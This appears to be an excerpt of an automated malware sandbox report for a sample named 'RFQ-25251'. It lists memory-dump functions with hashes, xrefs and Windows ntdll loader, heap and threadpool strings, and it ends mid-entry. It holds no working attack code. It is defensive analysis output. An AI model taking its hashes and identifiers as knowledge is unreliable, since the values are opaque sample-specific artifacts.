                              • LdrpInitializeImportRedirection, xrefs: 012E8177, 012E81EB
                              • LdrpInitializeProcess, xrefs: 012AC6C4
                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 012E81E5
                              • minkernel\ntdll\ldrinit.c, xrefs: 012AC6C3
                              • minkernel\ntdll\ldrredirect.c, xrefs: 012E8181, 012E81F5
                              • Loading import redirection DLL: '%wZ', xrefs: 012E8170
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                              • API String ID: 0-475462383
                              • Opcode ID: f7e8da0c4b8d4ade524445a1263cab27ce84d0756c849c877518a51ba16d85dc
                              • Instruction ID: 18411316b45786bd18b00ce567a77c789169e0e1e45b545da3e34bd710047678
                              • Opcode Fuzzy Hash: f7e8da0c4b8d4ade524445a1263cab27ce84d0756c849c877518a51ba16d85dc
                              • Instruction Fuzzy Hash: 693125B17647429FD324EF29D986E2AB7D4FFD4B54F40051CFA84AB291E620EC04C7A2
                              Function 012B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 012B2DF0: LdrInitializeThunk.NTDLL ref: 012B2DFA
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B0BA3
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B0BB6
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B0D60
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B0D74
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                              • String ID:
                              • API String ID: 1404860816-0
                              • Opcode ID: eaa2198dc861cecb5bf7c143406c65de2bb531dbec3cb575d2a74f48b6e2c61a
                              • Instruction ID: 320e4143a8f615a50bb5a0bfbbe0b6483f9c1f0aad5cf13925be566aa51add8a
                              • Opcode Fuzzy Hash: eaa2198dc861cecb5bf7c143406c65de2bb531dbec3cb575d2a74f48b6e2c61a
                              • Instruction Fuzzy Hash: AC424B71910716DFDB21CF28C885BEAB7F5FF04354F1445AAEA899B241E770A984CF60
                              Function 012829A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                              • API String ID: 0-3126994380
                              • Opcode ID: aafa745106839e8c89926b435bc69d3526d2ec360dc562aca53329107e739d9f
                              • Instruction ID: fe7135b3c7a8773f85db41b7adff8183cbef94cdc0c7503c9c2227d0c3e04ec4
                              • Opcode Fuzzy Hash: aafa745106839e8c89926b435bc69d3526d2ec360dc562aca53329107e739d9f
                              • Instruction Fuzzy Hash: 1892CC70A2624ADFEB25DF68C440BAEBBF1FF08704F188059E959AB391D774A941CF50
                              Function 0127A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                              • API String ID: 0-379654539
                              • Opcode ID: 66767308f0547620396198d4e15ed1d6f0a8d7246de58d727f5f97bdd6e15c2e
                              • Instruction ID: ae57c491cd832921ec435d8dcbdfaaa2e47c92a2e325459c5dcb617ccffd6ad8
                              • Opcode Fuzzy Hash: 66767308f0547620396198d4e15ed1d6f0a8d7246de58d727f5f97bdd6e15c2e
                              • Instruction Fuzzy Hash: 05C17671528382CFD721CF58C044B6FB7E4EF84724F08896AFA958B291E775C949CB52
                              Function 012A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                              Download Yara Rule
                              Strings
                              • LdrpInitializeProcess, xrefs: 012A8422
                              • minkernel\ntdll\ldrinit.c, xrefs: 012A8421
                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012A855E
                              • @, xrefs: 012A8591
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-1918872054
                              • Opcode ID: 38665b926f65b668a03d3b00456ad9149f16a458e91adee10f014bdf1cc819dd
                              • Instruction ID: 597440a671caff46f0c14413a2c651afba65c12d5a76e56c79829ed3a41b293e
                              • Opcode Fuzzy Hash: 38665b926f65b668a03d3b00456ad9149f16a458e91adee10f014bdf1cc819dd
                              • Instruction Fuzzy Hash: 64917F71568345AFD721EB25CC85FABBBE8FB84784F80092DFA8496151E730D944CB62
                              Function 012A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                              Download Yara Rule
                              Strings
                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012E21D9, 012E22B1
                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012E22B6
                              • .Local, xrefs: 012A28D8
                              • SXS: %s() passed the empty activation context, xrefs: 012E21DE
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                              • API String ID: 0-1239276146
                              • Opcode ID: cfa8573fa91b9e26e190de32d8f32335ddf8d45afad716fd6a64afcb1acadc23
                              • Instruction ID: 51cca5dcf8dfe677bbb28b50d26560ba89065ec30186548d98471f74ab5b324f
                              • Opcode Fuzzy Hash: cfa8573fa91b9e26e190de32d8f32335ddf8d45afad716fd6a64afcb1acadc23
                              • Instruction Fuzzy Hash: 55A1C23192022ADFDB24CF68CC88BA9B7B4BF58714F6441E9DA09A7251D7709E80CF90
                              Function 012764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                              Download Yara Rule
                              Strings
                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012D1028
                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012D106B
                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012D0FE5
                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012D10AE
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                              • API String ID: 0-1468400865
                              • Opcode ID: f9e4da2e0e3ae57c969d08a549b4c816b96cfd2221ba2baae1b0166e2a4e1a3f
                              • Instruction ID: fa0ecfb33f0cc9359c6cc1677d9613379c3c62a4b0c01b0caf6915304f8ee2e2
                              • Opcode Fuzzy Hash: f9e4da2e0e3ae57c969d08a549b4c816b96cfd2221ba2baae1b0166e2a4e1a3f
                              • Instruction Fuzzy Hash: 2271F3B19247069FDB21DF14C885FA77FA8AF54754F000468FA488B286D734D588DBD1
                              Function 0129245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                              Download Yara Rule
                              Strings
                              • minkernel\ntdll\ldrinit.c, xrefs: 012DA9A2
                              • apphelp.dll, xrefs: 01292462
                              • LdrpDynamicShimModule, xrefs: 012DA998
                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012DA992
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-176724104
                              • Opcode ID: c771f718bced0f256eb07cc1ac8738e82333191d306dd3dfe0d82e068d496cf8
                              • Instruction ID: f8ee313ecdcc417922574fa039870f39b81c49ec4231d946cbd7a45ba322abeb
                              • Opcode Fuzzy Hash: c771f718bced0f256eb07cc1ac8738e82333191d306dd3dfe0d82e068d496cf8
                              • Instruction Fuzzy Hash: 51316BB5620202EBDB319F6DC882EBA7BBCFB80B44F168019EA1167265C7B09841C790
                              Function 01280770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                              • API String ID: 0-4253913091
                              • Opcode ID: 6f0a5e8bd252a0f6bd2d64b8515ca69298b3c0f882befa068c1d5a0ef056777d
                              • Instruction ID: 799ef63793c3544ffa07497b9b1d81e09395ebaed5df1360f27a435fbb11d258
                              • Opcode Fuzzy Hash: 6f0a5e8bd252a0f6bd2d64b8515ca69298b3c0f882befa068c1d5a0ef056777d
                              • Instruction Fuzzy Hash: FBF1ED30B21606DFEB25EF68C884B6AB7F5FF44704F148168E6069B391D7B0E985CB94
                              Function 01296962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: $@
                              • API String ID: 0-1077428164
                              • Opcode ID: 692ddadb9b6382c1dac1d02b677d5cf25557e20d13b74d1ec1d709ede5dadf9b
                              • Instruction ID: 367bf930155f06c1b651f47053731de438e49fd23861da59f9c247ebe3e32279
                              • Opcode Fuzzy Hash: 692ddadb9b6382c1dac1d02b677d5cf25557e20d13b74d1ec1d709ede5dadf9b
                              • Instruction Fuzzy Hash: CDC271716283429FEB25CF28C841BABBBE5BF88754F04892DFA89C7241D774D845CB52
                              Function 0126A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: FilterFullPath$UseFilter$\??\
                              • API String ID: 0-2779062949
                              • Opcode ID: 8cf9b324b74ace7704ee68c6fc9f810e15ddb24e139e462063e8a622290c8094
                              • Instruction ID: e7ce230f5778362d802e6abf8e4ea451b86231d17259cae6b7396e13be987f94
                              • Opcode Fuzzy Hash: 8cf9b324b74ace7704ee68c6fc9f810e15ddb24e139e462063e8a622290c8094
                              • Instruction Fuzzy Hash: C2A14D7196162A9BDB31DF68CC88BE9B7B8EF44B10F1041E9DA0DA7250D7359E84CF50
                              Function 01290BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                              Download Yara Rule
                              Strings
                              • minkernel\ntdll\ldrinit.c, xrefs: 012DA121
                              • LdrpCheckModule, xrefs: 012DA117
                              • Failed to allocated memory for shimmed module list, xrefs: 012DA10F
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-161242083
                              • Opcode ID: 42f729fe44dfde1dd5af5ee3a2713d18315193a249f6f99b0ec0060b1cfc6f04
                              • Instruction ID: 9beb976517337ec07bb894952fab87f930ae17c07b59c6dd8ff15460207e2614
                              • Opcode Fuzzy Hash: 42f729fe44dfde1dd5af5ee3a2713d18315193a249f6f99b0ec0060b1cfc6f04
                              • Instruction Fuzzy Hash: 5171ADB0A2020ADFDF25DF6CC981BBEB7F8EB44744F14802DEA16A7251E774A941CB54
                              Function 01280A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                              • API String ID: 0-1334570610
                              • Opcode ID: 0f70fc272b7865bb2e8b7ef9582ef4a6217bd5e2754aa1c7f1a67e4732fc9105
                              • Instruction ID: 997fb635130841302063f4060929040876d98664b9c091a2759edc1cc36ba23e
                              • Opcode Fuzzy Hash: 0f70fc272b7865bb2e8b7ef9582ef4a6217bd5e2754aa1c7f1a67e4732fc9105
                              • Instruction Fuzzy Hash: 2961DF70621302DFDB29DF28C481B6ABBF5FF44304F14856AE9598F292D7B0E885CB95
                              Function 012AC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                              Download Yara Rule
                              Strings
                              • minkernel\ntdll\ldrinit.c, xrefs: 012E82E8
                              • LdrpInitializePerUserWindowsDirectory, xrefs: 012E82DE
                              • Failed to reallocate the system dirs string !, xrefs: 012E82D7
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-1783798831
                              • Opcode ID: 9d2bb7b280b55b8bc1051a1107c8225cf25231236a8102fd5b1257d36459cbaf
                              • Instruction ID: 70fe5d0a734fb4112c22d2cb7ebbff0e760f45bc1eef375c62c10186c415ce16
                              • Opcode Fuzzy Hash: 9d2bb7b280b55b8bc1051a1107c8225cf25231236a8102fd5b1257d36459cbaf
                              • Instruction Fuzzy Hash: 4841F3B1564306AFC725EB68ED45B6B7BECAF44750F40842AFA45D32A1EB70D810CB91
                              Function 0132C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                              Download Yara Rule
                              Strings
                              • @, xrefs: 0132C1F1
                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0132C1C5
                              • PreferredUILanguages, xrefs: 0132C212
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                              • API String ID: 0-2968386058
                              • Opcode ID: 9f264f34d813b157bc2b38db8b3e16e4b23779aa5cb2e4696723779d9c77f86d
                              • Instruction ID: 081bcf8bfec8da5034c41e161be7a22918fe57dbc2a78824be1a59181c8384e3
                              • Opcode Fuzzy Hash: 9f264f34d813b157bc2b38db8b3e16e4b23779aa5cb2e4696723779d9c77f86d
                              • Instruction Fuzzy Hash: E9416271E1031DEBDF11EAD8C881FEEBBBCAB15704F14406AE609B7280DB749A448B50
                              Function 01304144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                              • API String ID: 0-1373925480
                              • Opcode ID: 58ff5b2c7b37472d90ce885da96eb64f2c063afc5c9d98ae9ede8813a68d9085
                              • Instruction ID: fe3e3ee04d18c6cced57e313f3478d67163872a2337d7e09b1c68475d77ed87a
                              • Opcode Fuzzy Hash: 58ff5b2c7b37472d90ce885da96eb64f2c063afc5c9d98ae9ede8813a68d9085
                              • Instruction Fuzzy Hash: 81411132A112498BEB26DBA9C860BADBBF8FF55748F14045ADA01EB7C1D7349A01CB11
                              Function 012F4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                              Download Yara Rule
                              Strings
                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 012F4888
                              • LdrpCheckRedirection, xrefs: 012F488F
                              • minkernel\ntdll\ldrredirect.c, xrefs: 012F4899
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                              • API String ID: 0-3154609507
                              • Opcode ID: afd41acd4c67c7b7dd22a41f299eb21e7b7c3cf4f2e6f191b615436ed8c61f89
                              • Instruction ID: 52a6e7b93db98898075a303695a2bab196c233bcb02f5c572ebc05f8649f9679
                              • Opcode Fuzzy Hash: afd41acd4c67c7b7dd22a41f299eb21e7b7c3cf4f2e6f191b615436ed8c61f89
                              • Instruction Fuzzy Hash: A341D032A202929FCB25EF18D941A27FBE8AF49A50F05057DEF4997365D7B0E800CB91
                              Function 01280BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                              • API String ID: 0-2558761708
                              • Opcode ID: f6a08debee2cf41474053b38f34d245e1d7288774ee16214a095d06a4540901e
                              • Instruction ID: aa20d3d68b138d0d3989cf3e812c8183421f65afaa95ac5baae8af992dda1623
                              • Opcode Fuzzy Hash: f6a08debee2cf41474053b38f34d245e1d7288774ee16214a095d06a4540901e
                              • Instruction Fuzzy Hash: BD11D6313761429FD719EE18C441B7AB7B8EF40725F188129F406CB6D1E7B4E885C755
                              Function 012F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                              Download Yara Rule
                              Strings
                              • minkernel\ntdll\ldrinit.c, xrefs: 012F2104
                              • Process initialization failed with status 0x%08lx, xrefs: 012F20F3
                              • LdrpInitializationFailure, xrefs: 012F20FA
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-2986994758
                              • Opcode ID: ba767517c7fa5329f81fdda4e229b983207a2d2598fb358efb4c79640f838451
                              • Instruction ID: 5d5181b17dc936942c89529e454f68de0ad152c185697be097355111db46c091
                              • Opcode Fuzzy Hash: ba767517c7fa5329f81fdda4e229b983207a2d2598fb358efb4c79640f838451
                              • Instruction Fuzzy Hash: F6F0AF75660209EFE724E64CCC96FAA776DEB42B54F10006DFB0467286D2B0A9008695
                              Function 012803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: #%u
                              • API String ID: 48624451-232158463
                              • Opcode ID: cd57012d72c00254d54a217b4b929aed45c31cfdd274a40439bca172cdec7863
                              • Instruction ID: 31c5b3d640a165d4e9f538befce3437d6a454b962f044ee9accbcef0c88bd77e
                              • Opcode Fuzzy Hash: cd57012d72c00254d54a217b4b929aed45c31cfdd274a40439bca172cdec7863
                              • Instruction Fuzzy Hash: FD716D71A1114A9FDB01EF98C990BAEB7F8FF18704F144069EA05E7291E734ED01CB64
                              Function 0127A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                              Download Yara Rule
                              Strings
                              • LdrResSearchResource Enter, xrefs: 0127AA13
                              • LdrResSearchResource Exit, xrefs: 0127AA25
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                              • API String ID: 0-4066393604
                              • Opcode ID: c6eb9a7136f2b0c7f26d555430f7cdf9274a1659e5cd33308ff4a5816d479519
                              • Instruction ID: 08a64530c6ed91d5e9c7d7f78e71bcb912bb00097f373b5d08b431bb1033f6db
                              • Opcode Fuzzy Hash: c6eb9a7136f2b0c7f26d555430f7cdf9274a1659e5cd33308ff4a5816d479519
                              • Instruction Fuzzy Hash: 15E18371E2421ADFEB22DF98C981BAFBBB9BF14320F184425EA01E7241E774D941CB51
                              Function 0133A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: `$`
                              • API String ID: 0-197956300
                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                              • Instruction ID: 44c3623a934d9018224df7458266750a2dafde1abb37c969fc7a9beab0eac61d
                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                              • Instruction Fuzzy Hash: 85C1CF312043469BEB25CF28C841B6BBBE5AFD4328F084A2DF6D6DB290D775D505CB89
                              Function 012EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Legacy$UEFI
                              • API String ID: 2994545307-634100481
                              • Opcode ID: ced665c7678ea931493eb90cc867ea90c1457c5f83d5fe095c898e5f8aa503b4
                              • Instruction ID: 454c9c8d506a46d8d0ebab998a716541ccc5066b7ee0d831a6ee19463036b028
                              • Opcode Fuzzy Hash: ced665c7678ea931493eb90cc867ea90c1457c5f83d5fe095c898e5f8aa503b4
                              • Instruction Fuzzy Hash: 83616B71E602099FDB19DFA8C884BBEBBF9FB58740F55402DE649EB291D731A900CB50
                              Function 013143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$MUI
                              • API String ID: 0-17815947
                              • Opcode ID: 4f8fadda07b628d374767356231a28d66687a61afcc1d7a8d3e209508a8e791f
                              • Instruction ID: 0fea18e256a25f335d48261b9c6be7b5f1ba5118f1a9efe73c1918bd627a057c
                              • Opcode Fuzzy Hash: 4f8fadda07b628d374767356231a28d66687a61afcc1d7a8d3e209508a8e791f
                              • Instruction Fuzzy Hash: 94510971E1021EAFDF15DFA9CC80AEEBBBCEB48758F100529E611B7294DB309905CB60
                              Function 012704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                              Download Yara Rule
                              Strings
                              • kLsE, xrefs: 01270540
                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0127063D
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                              • API String ID: 0-2547482624
                              • Opcode ID: 8e08bc99245ff85e26709a578395bf31e2644c21f38552c2a348fe79f71e7220
                              • Instruction ID: aa9f6d17a74dde1e753aa432d2dd4f7a0b8ebc26236a7cea135c7bbaa6d7b07a
                              • Opcode Fuzzy Hash: 8e08bc99245ff85e26709a578395bf31e2644c21f38552c2a348fe79f71e7220
                              • Instruction Fuzzy Hash: 8651BE715247438FD724DF69C4406A7BBE4AF86304F10883EF69A87241E770E549CB9A
                              Function 0127A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                              Download Yara Rule
                              Strings
                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0127A309
                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0127A2FB
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                              • API String ID: 0-2876891731
                              • Opcode ID: c90bc5ac6897c01b936583c6fc200a337fdc065d1622154ba0abd55a6d597377
                              • Instruction ID: 9def1e6ca3d86f7ebf986fa55a90f9b1cea9fcdff4df6b3e974ffc0f2375ce99
                              • Opcode Fuzzy Hash: c90bc5ac6897c01b936583c6fc200a337fdc065d1622154ba0abd55a6d597377
                              • Instruction Fuzzy Hash: 3B41D031A2464ADFDB25DF6DC840B6EBBB4FF84710F2840A9EA11DB291E3B5D900CB54
                              Function 012AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Cleanup Group$Threadpool!
                              • API String ID: 2994545307-4008356553
                              • Opcode ID: bcae384d282ea500efe0cba78a8355e7b27090ba863868ef38c557c3bef15a92
